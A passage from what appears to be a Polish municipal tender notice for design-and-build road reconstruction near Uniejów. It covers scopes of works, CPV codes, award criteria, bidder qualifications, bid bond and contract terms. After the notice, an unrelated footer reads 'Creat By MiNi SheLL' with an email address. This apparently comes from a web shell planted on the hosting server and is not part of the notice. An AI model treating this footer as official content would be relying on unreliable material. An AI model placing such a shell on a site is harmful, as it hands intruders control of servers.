projektowej na przebudowę drogi na podstawie dołączonego do postępowania programu funkcjonalno-użytkowego. w tym projektu budowlanego, projektu wykonawczego, STWiORB, przedmiaru robót, kosztorysu inwestorskiego wraz z uzyskaniem uzgodnień, opinii, decyzji administracyjnych niezbędnych do przystąpienia, do realizacji zadania oraz wykonanie robót budowlanych zgodnie z SWZ, opracowanym projektem budowlanym i projektem wykonawczym, STWiORB, zasadami wiedzy technicznej i obowiązującymi w Rzeczypospolitej Polskiej przepisami prawa. Uzyskanie niezbędnych opinii, wymaganych prawem decyzji, uzgodnień i zezwoleń oraz przygotowanie materiałów do złożenia wniosku w celu uzyskania decyzji pozwolenie na budowę/zgłoszenie wykonania robót przez Wykonawcę oraz uzyskaniu innych decyzji administracyjnych niezbędnych do zrealizowania zadania inwestycyjnego <br/>4.1.1.2 Zakres robót budowlanych obejmuje wykonanie: <br/>pobocza z kruszywa łamanego grub. 15 cm po zagęszczeniu<br/>podbudowy zasadniczej z mieszanki niezwiązanej C90/3 (0/31,5) – 20,0 cm, <br/>warstwa ścieralna AC 11 S – 4,0 cm jak dla ruchu KR3<br/>4.1.2 Drogi wewnętrznej w m. Wilamów urządzonej na działce nr 421 i 517, obręb Wilamów o długości 0,952 km -wykonanie robót budowalnych w formule „ Zaprojektuj i wybuduj” na podstawie Programu Funkcjonalno- Użytkowego<br/>4.1.2.1 Zakres zamówienia obejmuje Opracowanie dokumentacji projektowej na przebudowę drogi na podstawie dołączonego do postępowania programu funkcjonalno-użytkowego, w tym projektu budowlanego, projektu wykonawczego, STWiORB, przedmiaru robót, kosztorysu inwestorskiego wraz z uzyskaniem uzgodnień, opinii, decyzji administracyjnych niezbędnych do przystąpienia, do realizacji zadania oraz wykonanie robót budowlanych zgodnie z SWZ, opracowanym projektem budowlanym i projektem wykonawczym, STWiORB, zasadami wiedzy technicznej i obowiązującymi w Rzeczypospolitej Polskiej przepisami prawa. Uzyskanie niezbędnych opinii, wymaganych prawem decyzji, uzgodnień i zezwoleń oraz przygotowanie materiałów do złożenia wniosku w celu uzyskania decyzji pozwolenie na budowę/zgłoszenie wykonania robót przez Wykonawcę oraz uzyskaniu innych decyzji administracyjnych niezbędnych do zrealizowania zadania inwestycyjnego <br/>4.1.2.2 Zakres robót budowlanych obejmuje wykonanie: <br/>podbudowy zasadniczej z mieszanki niezwiązanej C90/3 (0/31,5) – 20,0 cm, <br/>warstwy ścieralnej AC 11 S – 4,0 cm jak dla ruchu KR3<br/>ustawienie oznakowania pionowego<br/>4.1.3 Drogi gminnej nr 111172E Góry – Kuczki działka nr ewid 142 obręb Góry oraz na działce nr ewid. 211, obręb Kuczki o długości około 1,402km.- wykonanie robót budowalnych w formule „ Zaprojektuj i wybuduj” na podstawie Programu Funkcjonalno- Użytkowego<br/>4.1.3.1 Zakres zamówienia obejmuje :Opracowanie dokumentacji projektowej na remont drogi na podstawie dołączonego do postępowania programu funkcjonalno-użytkowego, w tym projektu budowlanego, projektu wykonawczego, STWiORB, przedmiaru robót, kosztorysu inwestorskiego wraz z uzyskaniem uzgodnień, opinii, decyzji administracyjnych niezbędnych do przystąpienia, do realizacji zadania oraz wykonanie robót budowlanych zgodnie z SWZ, opracowanym projektem budowlanym i projektem wykonawczym, STWiORB, zasadami wiedzy technicznej i obowiązującymi w Rzeczypospolitej Polskiej przepisami prawa. Uzyskanie niezbędnych opinii, wymaganych prawem decyzji, uzgodnień i zezwoleń oraz przygotowanie materiałów do złożenia wniosku w celu uzyskania decyzji pozwolenie na budowę/zgłoszenie wykonania robót przez Wykonawcę oraz uzyskaniu innych decyzji administracyjnych niezbędnych do zrealizowania zadania inwestycyjnego <br/>4.1.3.2 Zakres robót budowlanych obejmuje wykonanie: <br/>warstwy wyrównawczej AC 11 W – 3,0 cm, <br/>warstwy ścieralnej AC 11 S – 4,0 cm jak dla ruchu KR3<br/>obustronnych poboczy do szerokości 0,75 m z kruszywa kamiennego <br/>wykonanie oznakowania pionowego.<br/>4.1.4 Drogi wewnętrznej, Góry - Grabowa, Gm. Uniejów urządzonej na działce oznaczonej w ewidencji gruntów numerem 142, obręb Góry o długości około 0, 418 km .- wykonanie robót budowalnych w formule „ Zaprojektuj i wybuduj” na podstawie Programu Funkcjonalno- Użytkowego<br/>4.1.4.1 Zakres zamówienia obejmuje Opracowanie dokumentacji projektowej na przebudowę drogi na podstawie dołączonego do postępowania programu funkcjonalno-użytkowego, w tym projektu budowlanego, projektu wykonawczego, STWiORB, przedmiaru robót, kosztorysu inwestorskiego wraz z uzyskaniem uzgodnień, opinii, decyzji administracyjnych niezbędnych do przystąpienia, do realizacji zadania oraz wykonanie robót budowlanych zgodnie z SWZ, opracowanym projektem budowlanym i projektem wykonawczym, STWiORB, zasadami wiedzy technicznej i obowiązującymi w Rzeczypospolitej Polskiej przepisami prawa. Uzyskanie niezbędnych opinii, wymaganych prawem decyzji, uzgodnień i zezwoleń oraz przygotowanie materiałów do złożenia wniosku w celu uzyskania decyzji pozwolenie na budowę/zgłoszenie wykonania robót przez Wykonawcę oraz uzyskaniu innych decyzji administracyjnych niezbędnych do zrealizowania zadania inwestycyjnego <br/>4.1.4.2 Zakres robót budowlanych I etapu obejmuje: <br/>wykonanie dolnej warstwy podbudowy gr 10cm <br/>wykonanie poboczy gr 10cm <br/>4.1.5 Drogi wewnętrznej, Góry – Myszki , Gm. Uniejów urządzonej na działce oznaczonej w ewidencji gruntów numerem 182, obręb Góry o długości około 0, 999 km.- wykonanie robót budowalnych w formule „ Zaprojektuj i wybuduj” na podstawie Programu Funkcjonalno- Użytkowego<br/>4.1.5.1 Zakres zamówienia obejmuje Opracowanie dokumentacji projektowej na przebudowę drogi na podstawie dołączonego do postępowania programu funkcjonalno-użytkowego, w tym projektu budowlanego, projektu wykonawczego, STWiORB, przedmiaru robót, kosztorysu inwestorskiego wraz z uzyskaniem uzgodnień, opinii, decyzji administracyjnych niezbędnych do przystąpienia, do realizacji zadania oraz wykonanie robót budowlanych zgodnie z SWZ, opracowanym projektem budowlanym i projektem wykonawczym, STWiORB, zasadami wiedzy technicznej i obowiązującymi w Rzeczypospolitej Polskiej przepisami prawa. Uzyskanie niezbędnych opinii, wymaganych prawem decyzji, uzgodnień i zezwoleń oraz przygotowanie materiałów do złożenia wniosku w celu uzyskania decyzji pozwolenie na budowę/zgłoszenie wykonania robót przez Wykonawcę oraz uzyskaniu innych decyzji administracyjnych niezbędnych do zrealizowania zadania inwestycyjnego <br/>4.1.5.2 Zakres robót budowlanych I etapu obejmuje wykonanie : <br/>podbudowy zasadniczej z mieszanki niezwiązanej C90/3 (0/31,5) – 20,0 cm, <br/>warstwa ścieralna AC 11 S – 4,0 cm jak dla ruchu KR3<br/>4.1.5.3 Parametry drogi: <br/>Szerokość jezdni: 3,00 m<br/>Szerokość poboczy zmienna do 0,75 m<br/>przekrój daszkowy – pochylenie 2% <br/>4.1.6 drogi wewnętrznej w Czepowie, gm. Uniejów na działkach o numerach ewidencyjnych 611; 606/2; 607; 584/3; 596; 597; 595/3; 588/1; 585/2; 505; 504/3; 508; 507; 506; 467 obręb Czepów o długości 1,135km wykonanie robót budowlanych na podstawie dołączanej dokumentacji projektowej <br/>4.1.6.1 Zakres robót obejmuje między innymi:<br/>- rozbiórkę istniejącej nawierzchni z kruszywa;<br/>- korytowanie<br/>- wykonanie nowej nawierzchni bitumicznej na szerokości drogi 4,5m<br/>- wykonanie poboczy,<br/>- wykonanie nowego oznakowania pionowego,<br/>4.1.6.2 Zakres robót budowlanych I etapu obejmuje wykonanie : <br/>-Poboczy z kruszywa łamanego stan. mechanicznie 0/31,5 gr 15cm<br/>-Warstwy podbudowy z kruszywa łam. stab. mech. 0/63 gr 12 cm<br/>-Warstwa podbudowy kruszywa łam. stab. mech. 0/31,5 gr 8cm <br/>-Warstwy ścieralnej AC 11S 50/70 KR3 gr 4cm </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233223-8 - Wymiana nawierzchni drogowej</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Ocenie podlegają nie odrzucone oferty według następujących kryteriów:<br/>a) Cena - 60 %<br/>b) Okres gwarancji na który Wykonawca przedłuża okres rękojmi za wady – 40 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na który Wykonawca przedłuża okres rękojmi za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów :<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4)	zdolności technicznej lub zawodowej :<br/><br/>Wykonawca zrealizował nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej 3 roboty budowlane polegających na budowie, przebudowie, rozbudowie lub remoncie dróg, dla których łączna wartość robót nie może być niższa niż 3 000 000,00 zł brutto i na potwierdzenie tego przedstawi dowody potwierdzające, że roboty te zostały wykonane należycie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2.	Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia podmiotowych środków dowodowych .<br/>3.	Podmiotowe środki dowodowe wymagane od wykonawcy na wezwanie obejmują:<br/>1) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (tj. Dz. U. z 2021 r. poz. 275), z innym Wykonawca, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – Załącznik nr 7 do SWZ;<br/><br/>2) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/><br/>3)	oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy PZP w zakresie odnoszącym się do podstaw wykluczenia z postępowania wskazanym przez zamawiającego o których mowa w<br/>Rozdziale IX niniejszego SWZ - Załącznik nr 8 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2.	Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia podmiotowych środków dowodowych .4) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, przedmiotu, dat i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających , czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty - Załącznik nr 9 do SWZ;</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Ofertę stanowi:<br/>-Załącznik nr 1 – Formularz ofertowy.<br/>W przypadku, gdy Wykonawca nie korzysta z przygotowanego przez Zamawiającego wzoru, w treści oferty należy zamieścić wszystkie informacje wymagane w Formularzu Ofertowym. Treść oferty musi odpowiadać treści SWZ.<br/>-Oświadczenie o braku podstaw do wykluczenia i o spełnieniu warunków udziału – Załącznik nr 2<br/>-Zobowiązanie innego podmiotu do udostępnienia niezbędnych zasobów Wykonawcy – Załącznik nr 3 (jeżeli dotyczy)<br/>-Oświadczenie podmiotu udostępniającego zasoby o spełnieniu warunków oraz o niepodleganiu wykluczeniu – Załącznik nr 4 (jeżeli dotyczy)<br/>-Pełnomocnictwo (jeżeli dotyczy)<br/>-Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia na podstawie art. 117 ust 4 ustawy PZP – Załącznik nr 5 (jeżeli dotyczy)<br/>-Potwierdzenie wniesienia wadium<br/><br/><br/>1.	Do oferty Wykonawca zobowiązany jest dołączyć:<br/>1) aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o niepodleganiu wykluczeniu z postepowania, o którym mowa w art. 125 ust 1 Ustawy PZP – zgodnie z treścią Załącznika nr 2 do SWZ. Informacje zawarte w oświadczeniu, stanowią dowód, tymczasowo zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe potwierdzające brak podstaw wykluczenia i spełnienie warunków udziału w postępowaniu na dzień składania ofert, <br/>2) zobowiązanie podmiotu trzeciego do oddania do dyspozycji zasobów – załącznik nr 3 do SWZ (jeśli dotyczy).<br/>3) oświadczenie podmiotu udostępniającego zasoby o spełnianiu warunków udziału w postępowaniu oraz o niepodleganiu wykluczeniu z postepowania, o którym mowa w art. 125 ust 1 Ustawy PZP – zgodnie z treścią Załącznika nr 4 do SWZ. Informacje zawarte w oświadczeniu, stanowią dowód, tymczasowo zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe potwierdzające brak podstaw wykluczenia i spełnienie warunków udziału w postępowaniu na dzień składania ofert (jeśli dotyczy)<br/>4) pełnomocnictwo, w przypadku, gdy ofertę składają wykonawcy wspólnie ubiegający się o udzielenie zamówienia (np. Konsorcjum/spółka cywilna) oraz pełnomocnictwo do reprezentowania Wykonawcy, gdy ofertę podpisuje pełnomocnik (jeśli dotyczy).<br/>5) oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia na podstawie art. 117 ust 4 ustawy PZP – Załącznik nr 5 do SWZ (jeżeli dotyczy); <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Oferta musi być zabezpieczona wadium w wysokości :<br/>Dla części I : 30 000,00 zł (słownie zł: trzydzieści tysięcy zł 00/100).<br/>Dal części II: 30 000, 00 zł(słownie zł: trzydzieści tysięcy zł 00/100).<br/><br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/><br/>3. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>	- pieniądzu,<br/>	- gwarancjach bankowych,<br/>	- gwarancjach ubezpieczeniowych,<br/>- poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt.2 ustaw z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020, poz. 299).<br/> Zamawiający poza formami wnoszenia wadium ww. nie dopuszcza innych form jego<br/>	wnoszenia. <br/><br/>Wadium w pieniądzu należy wpłacić przelewem na konto Zamawiającego :<br/>18 8557 0009 2005 0200 0130 0026 podając w tytule wpłaty tytuł postępowania<br/>W przypadku wnoszenia wadium w formie pieniężnej za termin wniesienia wadium przyjmuje się datę uznania rachunku Zamawiającego. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania, w tym oświadczenie dotyczące przynależności lub braku przynależność do tej samej grupy kapitałowej, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>4.	Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców przed przystąpieniem do podpisania umowy o zamówienie publiczne. Termin, na jaki winna być zawarta umowa Wykonawców występujących wspólnie, nie może być krótszy od terminu określonego na wykonanie zamówienia.<br/>5.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia załączają do oferty oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 117 ust. 4 ustawy Pzp wskazując, które roboty budowlane wykonają poszczególni Wykonawcy – załącznik nr 5 do SWZ.<br/>6.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub do świadczenia Wykonawcy wspólnie ubiegających się o udzielenie zamówienia mogą polegać na zdolnościach tych Wykonawców, którzy wykonują roboty budowlane lub usług, do realizacji których te zdolności są wymagane. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonywania (...)w następujących przypadkach:1) zmiany wynagrodzenia Wykonawcy, w przypadku zmiany wynagrodzenia Wykonawcy spowodowanej zmianą stawki podatku od towarów i usług lub podatku akcyzowego, wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3–5 ustawy z 10.10.2002 r. o minimalnym wynagrodzeniu za pracę (Dz.U. z 2020 r. poz. 2207) albo minimalnej stawki godzinowej oraz zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne oraz zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę.(...)2) zmiany terminu realizacji zamówienia, w przypadku zaistnienia jednej z następujących okoliczności:a) zmiany będącej następstwem okoliczności leżących po stronie Zamawiającego, która spowodowała niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie(..)b) warunków atmosferycznych (...) c) wystąpienia robót dodatkowych lub zamiennych wprowadzonych poprzez zmiany w dokumentacji dokonane przez Zamawiającego po dacie podpisania przedmiotowej umowy;d) przedłużającego się oczekiwania na uzgodnienia, decyzje administracyjne, itp.; które to nie jest zawinione przez Wykonawcę e) działania siły wyższej,3) zmiany zasad finansowania zamówienia,4) zostanie stwierdzona konieczność zaniechania wykonania części robót budowlanych, powodująca zmniejszenie przedmiotu umowy i wynagrodzenia o kwotę stanowiącą równowartość zaniechanych robót<br/>5) zmiany uwarunkowań prawnych i formalnych realizacji przedmiotu zamówienia, spowodowanych działaniem osób trzecich,<br/>6) pozostałe zmiany spowodowane następującymi okolicznościami:<br/>a)zmiany dotyczącej zatrudnienia podwykonawców(..)<br/>b)zmiany albo rezygnacji z podwykonawcy (podmiotu zobowiązanego), na którego zasoby wykonawca powoływał się, w celu wykazania spełnienia warunków udziału w postępowaniu, na wniosek Wykonawcy uzasadniający taką zmianę, po wykazaniu przez Wykonawcę, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia,<br/>c)zmiany podwykonawców oraz zakresu podwykonawstwa w przypadku, gdy Wykonawca wykonuje umowę przy pomocy podwykonawców, po spełnieniu przesłanek wynikających z SWZ, umowy oraz ustawy, <br/>d)zmiany nazwy, adresu jakiejkolwiek ze stron umowy,<br/>e)zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym bezpośredni wpływ na realizację przedmiotu umowy lub świadczenia stron umowy.(...)<br/>10. Zamawiający przewiduje również możliwość dokonania zmian i uzupełnień w niniejszej umowie, które nie stanowią istotnych zmian postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy (zmiany zgodne <br/>z dyspozycją art. 455 ustawy), (..)<br/>11.Warunki zmiany ceny 1) W przypadku, gdy w trakcie obowiązywania umowy ulegnie obniżeniu stawka podatku od towarów i usług (...)<br/>2) W przypadku, gdy w trakcie obowiązywania umowy ulegnie podwyższeniu stawka podatku od towarów i usług na usługi (...) 3) W przypadku, gdy w trakcie obowiązywania umowy ulegnie zmianie wysokość minimalnego wynagrodzenia za pracę albo wysokość minimalnej stawki godzinowej, (...)<br/>4) W przypadku, gdy w trakcie obowiązywania umowy ulegną zmianie zasady podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu (...)<br/>5) W przypadku, gdy w trakcie obowiązywania umowy ulegną zmianie zasady gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych(..)<br/>6) Wynagrodzenie Wykonawcy za roboty niewykonane może zostać zwaloryzowane dla oddania zmiany (wzrostu lub spadku) cen materiałów lub kosztów związanych z realizacją zamówienia. Szczegółowy zakres został wskazany w SWZ rozdział XXIII i projekcie umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy złożyć na Platformie pod adresem: https://gminauniejow.ezamawiajacy.pl w zakładce „OFERTY&#34;</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-27 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-25</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Przedmiot zamówienia będzie realizowany przy udziale środków z Programu, Rządowy Fundusz Polski Ład: Program Inwestycji Strategicznych.<br/>3)	Na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego z postępowania o udzielenie zamówienia publicznego lub konkursu wyklucza się:<br/>a) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych<br/>w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3,<br/>b) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na<br/>podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3,<br/>c) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i<br/>2106) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3.

Creat By MiNi SheLL
Email: jattceo@gmail.com